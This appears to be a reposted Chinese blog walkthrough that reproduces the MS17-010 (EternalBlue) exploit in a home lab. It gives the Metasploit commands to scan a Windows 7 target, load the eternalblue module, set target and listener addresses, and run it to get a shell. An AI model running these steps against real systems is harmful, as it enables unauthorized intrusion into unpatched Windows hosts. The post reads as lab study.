码迷,mamicode.com
首页 > 其他好文 > 详细

MS17-010漏洞复现

时间:2019-02-10 09:18:06      阅读:215      评论:0      收藏:0      [点我收藏+]

标签:play   搜索   use   inf   nbsp   img   width   search   smb   

 攻击机:192.168.148.132  kali linux2018.2  x64

靶机:192.168.1.129    win7   x64

首先msfconsole的smb模块扫描,看看是否有漏洞

use auxiliary/scanner/smb/smb_ms17_010

set rhosts 192.168.1.129 (目标主机)

技术图片

 Host is likely VULNERABLE to MS17-010! - Windows 7 Professiona

 

表示这个主机存在这个漏洞

 

1 search  ms17_010 搜索这个漏洞

技术图片

2   use exploit/windows/smb/ms17_010_eternalblue           

                  利用这个漏洞

3 show options

技术图片

msf exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.1.129  目标主机

rhost => 192.168.1.129

msf exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.1.132 攻击者主机

lhost => 192.168.1.132

msf exploit(windows/smb/ms17_010_eternalblue) > set lport 8888 监听端口 (这个可以随意,但要大于2000,个人认为)

技术图片

run  开始攻击 这个表示拿shell成功了

技术图片

 

 

MS17-010漏洞复现

标签:play   搜索   use   inf   nbsp   img   width   search   smb   

原文地址:https://www.cnblogs.com/lanyincao/p/10358571.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!